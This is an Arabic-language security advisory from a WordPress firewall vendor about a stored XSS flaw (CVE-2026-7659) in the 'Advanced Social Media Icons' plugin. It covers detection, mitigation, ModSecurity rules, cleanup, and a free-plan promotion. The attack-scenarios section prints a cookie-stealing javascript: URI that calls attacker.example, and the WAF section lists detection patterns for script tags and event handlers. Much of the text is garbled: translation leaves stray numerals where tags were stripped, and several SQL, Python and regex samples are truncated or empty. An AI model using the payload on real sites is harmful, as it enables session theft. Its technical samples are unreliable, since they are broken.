اسم البرنامج الإضافي	أيقونات الوسائط الاجتماعية المتقدمة
نوع الضعف	البرمجة النصية عبر المواقع (XSS)
رقم CVE	CVE-2026-7659
الاستعجال	واسطة
تاريخ نشر CVE	2026-05-11
رابط المصدر	CVE-2026-7659

إشعار أمني عاجل: XSS مخزنة (مساهم) مصادق عليها في ‘أيقونات الوسائط الاجتماعية المتقدمة’ (<= 1.2) — كيفية حماية مواقع ووردبريس الخاصة بك

مؤلف: فريق أمان WP‑Firewall
تاريخ: 2026-05-12

ملخص
توجد ثغرة في البرمجة النصية عبر المواقع المخزنة (XSS) (CVE-2026-7659) في إضافة “أيقونات الوسائط الاجتماعية المتقدمة” لووردبريس، تؤثر على الإصدارات <= 1.2. يمكن لمستخدم مصادق عليه لديه صلاحيات مساهم (أو أعلى) تخزين حمولات JavaScript التي يتم عرضها لاحقًا للزوار، مما قد يمكّن من الاستيلاء على الحسابات، أو إعادة التوجيه الخبيثة، أو توزيع البرمجيات الضارة. يشرح هذا الإشعار التهديد، سيناريوهات الاستغلال، خطوات الكشف، والتخفيفات الفورية وطويلة الأجل — من منظور كل من المطور ومشغل موقع ووردبريس.

---

جدول المحتويات

• الملخص التنفيذي
• ما هو XSS المخزن ولماذا يهم هذا
• التفاصيل الفنية للثغرة
• من هو المعرض للخطر (الأدوار، الإصدارات، المتطلبات المسبقة)
• سيناريوهات الهجوم الواقعية
• كيفية تحديد ما إذا كان موقعك معرضًا للخطر أو تم استغلاله
• خطوات التخفيف الفورية (أول 24-48 ساعة)
• قواعد WAF لجدار الحماية WP-الموصى بها وأفكار التكوين
• التعافي والتنظيف بعد الاستغلال
• تعزيز الحماية والوقاية على المدى الطويل
• لماذا يهم إضافة جدار حماية ومدير مسح
• قم بتأمين موقعك اليوم — خطة مجانية متاحة
• الملحق: استعلامات CLI/DB المفيدة ونماذج نصوص الكشف
• ملاحظات نهائية ودعم

---

الملخص التنفيذي

إذا كان موقعك يستخدم إضافة “أيقونات الوسائط الاجتماعية المتقدمة” بالإصدار 1.2 أو أقدم، يجب أن تفترض أن الإضافة معرضة للخطر حتى تؤكد خلاف ذلك. تسمح الثغرة للمستخدمين المصادق عليهم (دور المساهم) بحفظ مقاطع JavaScript في بيانات تديرها الإضافة (على سبيل المثال، حقول الأيقونات، روابط URL، أو تسميات) التي يتم عرضها لاحقًا للزوار في الواجهة الأمامية دون تطهير أو ترميز مناسب. يمكن استخدام XSS المخزنة لـ:

• تنفيذ JavaScript في سياق الزوار أو المسؤولين الذين يشاهدون الصفحات المتأثرة.
• سرقة ملفات تعريف الارتباط للجلسة أو تنفيذ إجراءات كمستخدم آخر (إذا كانت ملفات تعريف الارتباط أو حماية CSRF ضعيفة).
• حقن إعادة توجيه دائمة، نماذج تصيد، أو نصوص تعدين/عملات مشفرة.
• استخدام الموقع كموزع للعدوى لتنزيلات سريعة.

نظرًا لأن الثغرة مخزنة، يمكن لحساب مساهم ضار واحد أن يؤثر على كل زائر للصفحات أو الأدوات حيث يقوم المكون الإضافي بإخراج البيانات الضارة.

---

ما هو XSS المخزن ولماذا يهم هذا

البرمجة النصية عبر المواقع (XSS) هي هجوم حقن حيث يتسبب المهاجم في جعل متصفح الضحية يقوم بتشغيل JavaScript يتحكم فيه المهاجم. تعني XSS المخزنة أن الحمولة مخزنة على الخادم (في قاعدة البيانات، الخيارات، بيانات المنشور، أو إعدادات المكون الإضافي) ويتم تسليمها إلى الضحايا لاحقًا.

XSS المخزنة خطيرة بشكل خاص لأنها:

• دائمة ويمكن أن تؤثر على أعداد كبيرة من الزوار.
• يمكن أن تستهدف كل من الزوار المجهولين ومستخدمي الموقع، بما في ذلك المسؤولين.
• غالبًا ما يكون من السهل تحويلها إلى استيلاء على الحساب أو الانتقال إلى استغلال جانب الخادم (على سبيل المثال، عبر إساءة استخدام واجهة برمجة التطبيقات REST، CSRF).

حتى إذا كانت دور المستخدم المطلوب لتخزين الحمولة منخفضة مثل المساهم، فإن العديد من المواقع تسمح للمساهمين بتقديم محتوى يتم مراجعته لاحقًا من قبل مستخدمين ذوي امتيازات أعلى - مما يخلق فرصًا واقعية للاستغلال.

---

التفاصيل الفنية للثغرة

• فئة الثغرة: حقن نصوص عبر المواقع المخزنة (XSS)
• المكونات الإضافية المتأثرة: أيقونات الوسائط الاجتماعية المتقدمة
• الإصدارات المتأثرة: <= 1.2
• CVE: CVE‑2026‑7659
• الامتياز المطلوب: المساهم (المعتمد)
• تصحيح: لا يوجد تصحيح رسمي متاح في وقت النشر (تأكيد نصيحة البائع للحصول على التحديثات)

السبب الجذري (نمط نموذجي تم ملاحظته):

• يقبل المكون الإضافي إدخال المستخدم لعلامات أيقونات التواصل الاجتماعي، أو عناوين URL، أو HTML مخصص ويخزنه في قاعدة البيانات.
• عند عرض هذه القيم على الواجهة الأمامية (الأدوات، الرموز القصيرة، منشئي الصفحات)، يقوم المكون الإضافي بإخراج هذه الحقول دون الهروب/الترميز المناسب، ودون تطهير أو إزالة السمات أو العلامات الخطرة.
• الحقول التي من المتوقع أن تكون عناوين URL أو أسماء أيقونات لا يتم التحقق منها؛; جافا سكريبت: عناوين URL،, على* سمات الأحداث، أو 6. يتم قبول العلامات أو تخزينها وعرضها.

المصارف الضعيفة النموذجية:

• استدعاءات إخراج الأداة حيث يقوم المكون الإضافي بإخراج القيم المخزنة مباشرة.
• وظائف عرض الرموز القصيرة التي تستخدم صدى $value بدلاً من esc_html(), esc_attr() أو esc_url().
• أجزاء القالب المضمنة باستخدام تضمين/يتطلب مع متغيرات غير مُعالجة.

---

من هو المعرض للخطر؟

• المواقع التي تعمل بالملحق عند الإصدارات <= 1.2.
• المواقع التي تسمح للمستخدمين بالتسجيل أو الإنشاء بأدوار المساهمين أو أعلى.
• المدونات متعددة المؤلفين حيث يتمتع المساهمون بالوصول إلى ميزات الملحق أو الأدوات.
• المواقع التي يقوم فيها المسؤولون أو المحررون بمراجعة المحتوى الذي قد يحتوي على حقول الملحق - يمكن استهداف هذه الأدوار العليا من خلال الهندسة الاجتماعية (على سبيل المثال، يقوم المساهم بتقديم منشور يؤدي إلى تشغيل كود ضار عند معاينته).

ملحوظة: إذا كان موقعك 9. تعتمد فقط على إلغاء تثبيت أو حذف الإضافات والسمات. يستخدم هذا الملحق، أو تم ترقيته إلى إصدار ثابت من البائع، فقد لا تتأثر. تحقق دائمًا من إصدار الملحق وملاحظات إصدار البائع.

---

سيناريوهات الهجوم الواقعية

1. يقوم المساهم الضار بتثبيت أو استخدام واجهة مستخدم مقدمة من الملحق لإضافة إدخال أيقونة اجتماعية جديدة. في حقل URL يدخلون:
   javascript:fetch('https://attacker.example/steal?c=' + document.cookie)
   عندما ينقر زائر الموقع على الأيقونة (أو إذا كان الملحق يعرض URL في href الذي يفتح تلقائيًا)، يتم تسريب ملفات تعريف الارتباط الخاصة بالزائر.
2. يقوم المساهم بحقن 6. كتلة في حقل التسمية الذي يتم عرضه في أداة:
   <script>/* malicious landing page redirect or XHR */</script>
   كل زائر للصفحات التي تحتوي على تلك الأداة سينفذ السكربت.
3. يضيف المساهم أيقونة مع عند المرور بالماوس سمة أو يستخدم حمولة HTML في إدخال يتوقع نصًا فقط؛ يقوم الملحق بعرضها بشكل غير آمن مما يتسبب في تشغيل الحدث عند تفاعل الماوس.
4. الهندسة الاجتماعية: يقوم المساهم الضار بإنشاء محتوى يقنع المحررين/المسؤولين بمعاينة أو الموافقة على المحتوى؛ تستدعي معاينة المسؤول الحمولة المخزنة XSS في سياق المسؤول، مما يسمح بإساءة استخدام الامتيازات أو الاستيلاء على الموقع.

لأن المساهمين غالبًا ما يُعتمد عليهم في رفع المحتوى، يمكن أن تظل XSS المخزنة غير مكتشفة.

---

كيفية تحديد ما إذا كان موقعك معرضًا للخطر أو تم استغلاله

1. التحقق من إصدار البرنامج المساعد:
   • لوحة التحكم -> الإضافات -> ابحث عن “أيقونات الوسائط الاجتماعية المتقدمة” -> تحقق من الإصدار. إذا كان <= 1.2، اعتبره عرضة للخطر.
2. ابحث في قاعدة البيانات عن سلاسل مشبوهة:
   • بحث 6., جافا سكريبت:, عند تمرير الماوس فوق=, عند حدوث خطأ= أو معالجات أحداث أخرى في أسماء خيارات متعلقة بالإضافة، أو بيانات ما بعد المنشور، أو إعدادات الأدوات.
3. استعلامات WP‑CLI و SQL المفيدة (أمثلة في الملحق):
   • ابحث في بيانات ما بعد المنشور والخيارات عن علامات السكربت أو URIs الخاصة بـ javascript:.
   • استخدم WP‑CLI لتصدير إعدادات الأدوات وفحصها.
4. سجلات الويب والتحليلات:
   • ارتفاعات غير عادية في الاتصالات الصادرة إلى مجالات غير معروفة.
   • تنبيهات عن نشاط XHR أو إعادة التوجيه في سجلات الواجهة الأمامية أو سجلات CDN.
   • نشاط غير متوقع على شاشة الإدارة من تسجيلات الدخول أو المعاينة الطلبات.
5. فحوصات الواجهة الأمامية:
   • تصفح يدوي للصفحات التي تتضمن أدوات أيقونات اجتماعية في وضع التصفح المتخفي وعرض مصدر الصفحة للبحث عن علامات سكربت أو سمات غير متوقعة.
   • تعطيل JavaScript والتحقق مما إذا كان المحتوى لا يزال يحتوي على تعليمات ترميز مشبوهة.
6. مؤشرات سلوكية:
   • زوار يبلغون عن إعادة توجيه أو نوافذ منبثقة.
   • محركات البحث تشير إلى الموقع على أنه غير آمن.
   • تغييرات إدارية غير متوقعة أو تعديلات على المحتوى.

إذا وجدت محتوى مشبوهًا، اعتبر الموقع مخترقًا وابدأ في العزل والتنظيف.

---

خطوات التخفيف الفورية (أول 24-48 ساعة)

1. ضع الموقع في وضع الصيانة، إذا أمكن - قيد الوصول للزوار العموميين أثناء التحليل.
2. إذا استطعت، قم بتعطيل الإضافة مؤقتًا:
   • لوحة التحكم -> الإضافات -> تعطيل “أيقونات الوسائط الاجتماعية المتقدمة”.
   • أو إعادة تسمية مجلد الإضافة عبر SFTP (wp-content/plugins/advanced-social-media-icons -> …_disabled) لإيقاف التنفيذ.
3. مراجعة وتقييد أدوار المستخدمين:
   • سحب مؤقت لامتيازات دور المساهم التي تسمح بالتغييرات على بيانات المكون الإضافي (أو حظر تسجيل مستخدمين جدد).
   • تغيير كلمات مرور المسؤول/المحرر وفرض كلمات مرور قوية و2FA إذا كانت متاحة.
4. مسح الموقع على الفور:
   • تشغيل ماسح البرامج الضارة أو مسح البرامج الضارة للمكون الإضافي للأمان.
   • تصدير وفحص بيانات المكون الإضافي والأدوات الحديثة لـ 6./جافا سكريبت:.
5. إذا كان هناك تصحيح نظيف متاح من البائع، قم بتطبيقه على الفور ثم قم بالمسح مرة أخرى.
6. إذا لم يكن هناك تصحيح رسمي:
   • إزالة أو تعطيل المكون الإضافي بشكل دائم إذا لم تتمكن من تطهير البيانات المخزنة بأمان.
   • استبدال الوظائف ببديل مدعوم وآمن، أو بناء تكامل سمة محلي.
7. إخطار أصحاب المصلحة:
   • إبلاغ مالكي الموقع، والمسؤولين، والأطراف المتأثرة عن الثغرة والإجراءات المتخذة.
8. النسخ الاحتياطي:
   • أخذ نسخة احتياطية كاملة قبل إجراء التغييرات (قاعدة البيانات + الملفات) للتحليل الجنائي. تخزين النسخ الاحتياطية في وضع عدم الاتصال.

---

قواعد WAF لجدار الحماية WP-الموصى بها وأفكار التكوين

جدار حماية تطبيق الويب هو طبقة عملية لتقليل أو حظر الاستغلال أثناء تطبيق إصلاح دائم. فيما يلي قواعد واقتراحات عملية يمكنك تنفيذها على WAF (أنماط عامة) - هذه أمثلة مخصصة لجدار حماية تطبيق ويب حديث يدعم regex وفحص جسم الطلب.

مهم: اختبار أي قاعدة في وضع الكشف/التسجيل أولاً لقياس الإيجابيات الكاذبة.

1. حظر طلبات POST إلى نقاط نهاية إدارة المكون الإضافي مع حمولات مشبوهة:

# حظر أجسام الطلب التي تحتوي على  أو javascript: URIs في مسار المكون الإضافي"

2. حظر محاولات التخزين جافا سكريبت: عناوين URI:

SecRule ARGS_NAMES|ARGS "(?i)href|url|link|icon" "chain,phase:2,deny,log,msg:'تم حظر javascript: URI في حقل المكون الإضافي'"

3. حظر سمات معالج الأحداث في الإدخال:

SecRule REQUEST_BODY "(?i)on\w+\s*=" "phase:2,deny,log,msg:'تم حظر معالج الأحداث المضمن في جسم الطلب'"

4. قاعدة عامة للحظر 6. علامات:

SecRule REQUEST_BODY "(?i).*?" "phase:2,deny,log,msg:'تم حظر البرنامج النصي المضمن في جسم الطلب'"

5. قواعد تحديد المعدل / السلوك:
   • تحديد عدد المرات التي يمكن لحساب معين تعديل إعدادات المكون الإضافي / الأدوات فيها خلال فترة زمنية قصيرة.
   • مراقبة وتقييد حسابات المساهمين التي تقوم بتحديثات متكررة للمكون الإضافي أو الأداة.
6. تنفيذ سياسة أمان المحتوى (CSP):
   إضافة رأس CSP لمنع البرامج النصية المضمنة حيثما كان ذلك ممكنًا:
   سياسة أمان المحتوى: المصدر الافتراضي 'ذاتي'; مصدر السكربت 'ذاتي' https://trusted.cdn.example; مصدر الكائن 'لا شيء'; نقطة نهاية تقرير /csp-report-endpoint
   تساعد CSP في التخفيف من تأثير البرامج النصية المدخلة من خلال منع تنفيذ البرامج النصية المضمنة أو البرامج النصية من مصادر غير موثوقة، ولكن CSP يمكن أن تكون معقدة - اختبر قبل النشر.
7. استثناءات WAF والتنظيف:
   • إذا كان المكون الإضافي يستخدم أسماء معلمات POST محددة (افحص كود المكون الإضافي أو المكالمات الشبكية)، قم بصياغة قواعد لتنظيف تلك الحقول عن طريق إزالة أو رفض الحمولة التي تحتوي على رموز مشبوهة.
   • استخدم تصحيح WAF الافتراضي (توقيع يمنع النمط القابل للاستغلال) أثناء انتظار تصحيح البائع.

ملحوظة: لا يعد WAF بديلاً عن الإصلاحات المناسبة على جانب الخادم. يقلل WAF من المخاطر أثناء تصحيحك أو إزالة المكون الإضافي.

---

التعافي والتنظيف بعد الاستغلال

1. عزل الموقع:
   قم بإيقافه أو تقييد الوصول إلى عناوين IP المسموح بها أثناء التنظيف.
2. الحفاظ على الأدلة:
   قم بتصدير السجلات، ومدخلات قاعدة البيانات المصابة، ونسخة من الملفات للتحليل الجنائي قبل التنظيف.
3. تنظيف مدخلات HTML / قاعدة البيانات:
   إزالة الحمولة المخزنة من الجداول المتعلقة بالمكون الإضافي، خيارات الأداة، postmeta، وإعدادات المكون الإضافي.
   استخدم البحث الدقيق والإزالة مع النسخ الاحتياطية؛ تجنب فقدان البيانات عن غير قصد.
4. إعادة بناء الحسابات والاعتمادات المخترقة:
   تغيير جميع كلمات مرور المسؤول والمحرر.
   إلغاء وإعادة إصدار مفاتيح API، الرموز، وأي بيانات اعتماد OAuth.
   تحقق من اختراقات البريد الإلكتروني المرتبطة بالأدوار الإدارية.
5. قم بفحص وتنظيف الملفات:
   قم بتشغيل ماسح ضوئي للبرامج الضارة محدث لاكتشاف الأبواب الخلفية المزروعة.
   تفقد wp-content/uploads, ، مجلدات السمات، ودلائل المكونات الإضافية للملفات PHP غير المعروفة أو المهام المجدولة.
6. إعادة تثبيت المكون الإضافي من مصدر نظيف:
   إذا كنت تنوي الاستمرار في استخدام المكون الإضافي، أعد التثبيت من المستودع الرسمي بعد أن يصدر البائع تصحيحًا وتحقق من سلامته.
7. إشعار:
   إذا تم كشف بيانات المستخدم، اتبع الالتزامات القانونية/التنظيمية للإفصاح والتصحيح.
8. مراجعة ما بعد الحادث:
   وثق كيف استغل المهاجم النظام واضبط السياسات والضوابط.

---

تعزيز الحماية والوقاية على المدى الطويل

1. مبدأ الحد الأدنى من الامتياز:
   قلل من عدد حسابات المستخدمين التي تتمتع بامتيازات المساهمين+.
   استخدم مكونات إدارة الأدوار أو القدرات المخصصة لتقييد من يمكنه تعديل إعدادات المكون الإضافي أو الأدوات.
2. عزز سير العمل لمراجعة المحتوى:
   تجنب السماح للمساهمين بتحرير محتوى الأدوات المدارة بواسطة المكون الإضافي مباشرة.
   استخدم قوائم الاعتدال وتحقق من المحتوى في المعاينة مع تعطيل JavaScript.
3. التحقق من صحة المدخلات وترميز المخرجات:
   المطورون: تحقق دائمًا من صحة البيانات وتنظيفها عند الإدخال؛ هرب المخرجات باستخدام esc_html(), esc_attr(), esc_url() اعتمادًا على السياق.
4. حافظ على تحديث كل شيء:
   يجب تحديث نواة WordPress، والسمات، والمكونات الإضافية على الفور. اشترك في إشعارات أمان البائع.
5. تنفيذ رؤوس CSP وX-Content-Type-Options:
   يقلل CSP من تأثير XSS.
   X-Content-Type-Options: nosniff يمنع استنشاق نوع MIME.
6. WAF + ماسح ضوئي للبرامج الضارة:
   استخدم WAF مُدار لتغطية الثغرات المكتشفة حديثًا حتى يتم تطبيق إصلاحات البائع. قم بتشغيل فحوصات الخادم والموقع بانتظام.
7. المراقبة والتسجيل:
   قم بتمكين تسجيل مفصل لإجراءات المسؤول، وتحديثات المكونات الإضافية، وطلبات POST المشبوهة.
   دمج مع أدوات SIEM أو أدوات المراقبة لاكتشاف الشذوذ.
8. النسخ الاحتياطي واستعادة الكوارث:
   الحفاظ على نسخ احتياطية متكررة مخزنة في موقع خارجي واختبار الاستعادة.

---

لماذا يهم إضافة جدار حماية ومدير مسح

نهج أمان متعدد الطبقات يقلل بشكل كبير من فترة التعرض. بينما يقوم بائعو المكونات الإضافية بإصلاح الثغرات، سيفعل جدار الحماية النشط والماسح:

• اكتشاف وحظر أنماط الاستغلال الشائعة (البرامج النصية المضمنة،, جافا سكريبت: URIs).
• توفير تصحيح افتراضي - حظر محاولات الاستغلال بالقرب من يوم الصفر.
• مسح وتنبيه على علامات الاختراق (البرامج الضارة، التغييرات المشبوهة).
• مراقبة الشذوذ في سلوك حركة المرور ومنع محاولات الاستغلال الجماعي.

هذه القدرات مفيدة بشكل خاص للمواقع التي لا يمكن فيها إزالة المكونات الإضافية على الفور أو إصلاح التعليمات البرمجية (مثل، نشرات متعددة المواقع الكبيرة، التخصيصات المعقدة).

---

تأمين موقعك اليوم - جرب WP‑Firewall مجانًا

إذا كنت ترغب في طريقة سريعة وبدون تكلفة لإضافة الحماية أثناء تقييمك وإصلاحك لهذه الثغرة، فإن خطة WP‑Firewall الأساسية (مجانية) توفر دفاعات أساسية:

• حماية أساسية: جدار حماية مُدار مع WAF بمستوى إنتاج، عرض نطاق غير محدود، مسح للبرامج الضارة، وتغطية لمخاطر OWASP Top 10.
• إنها خطوة خفيفة وسهلة يمكنك تفعيلها اليوم لتقليل المخاطر بينما تقوم بتصحيح أو استبدال المكونات الإضافية المعرضة للخطر.

قارن الخطط بسرعة وابدأ الخطة الأساسية المجانية هنا:
https://my.wp-firewall.com/buy/wp-firewall-free-plan/

(إذا كنت بحاجة إلى تنظيف تلقائي أو تخفيف أكثر تقدمًا، فكر في خطط Standard أو Pro التي تشمل إزالة البرامج الضارة تلقائيًا، وإدراج/إزالة عناوين IP، وتقارير أمان شهرية، وتصحيح افتراضي تلقائي.)

---

الملحق - فحوصات CLI وSQL العملية

استخدم هذه كنقاط انطلاق. دائمًا اختبر في بيئة اختبار واحتفظ بنسخة احتياطية قبل التعديلات.

1. WP‑CLI: ابحث عن علامات البرنامج النصي في إعدادات الأدوات

   wp option get sidebars_widgets --format=json | jq '.' > widgets.json
   

2. SQL: البحث خيارات wp و wp_postmeta لعلامات السكريبت أو URIs جافا سكريبت

   -- ابحث عن علامات السكريبت في الخيارات;
   

3. WP‑CLI: تصدير إجراءات المستخدمين الأخيرة والبحث عن تغييرات غير متوقعة

   wp user list --role=contributor --fields=ID,user_login,user_email
   

4. سكريبت بايثون أساسي لفحص ملفات HTML بحثًا عن السكريبتات المدمجة (مثال)

   import re, os
   

---

ملاحظات نهائية ودعم

• أعطِ الأولوية للتحقق من إصدارات الإضافات ومراجعة بيانات المسؤول/الأداة بحثًا عن محتوى مشبوه.
• إذا وجدت دليلًا على الاختراق، عزل الموقع واطلب مساعدة محترف أمان لتنظيف الطب الشرعي.
• يقلل WAF المدمج مع برنامج فحص قوي من نطاق الانفجار أثناء تخطيطك للإصلاح.

إذا كنت ترغب في المساعدة في تنفيذ التصحيحات الافتراضية، أو تكوين توقيعات WAF، أو إجراء فحص/تنظيف كامل للموقع، فإن فريق عمليات الأمان لدينا مستعد للمساعدة. للحماية الفورية، ضع في اعتبارك تفعيل خطة WP‑Firewall Basic (مجانية) الآن:
https://my.wp-firewall.com/buy/wp-firewall-free-plan/

ابقى آمنًا
فريق أمان WP‑Firewall